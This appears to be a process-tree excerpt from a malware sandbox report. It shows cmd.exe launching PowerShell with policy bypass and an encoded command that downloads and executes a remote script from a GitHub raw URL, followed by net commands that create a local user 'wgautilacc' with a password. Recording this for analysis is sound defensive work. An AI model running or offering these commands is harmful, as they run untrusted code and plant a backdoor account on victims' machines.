C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:3904
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3440
-
-
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵PID:3128
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵PID:716
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵PID:1852
-
-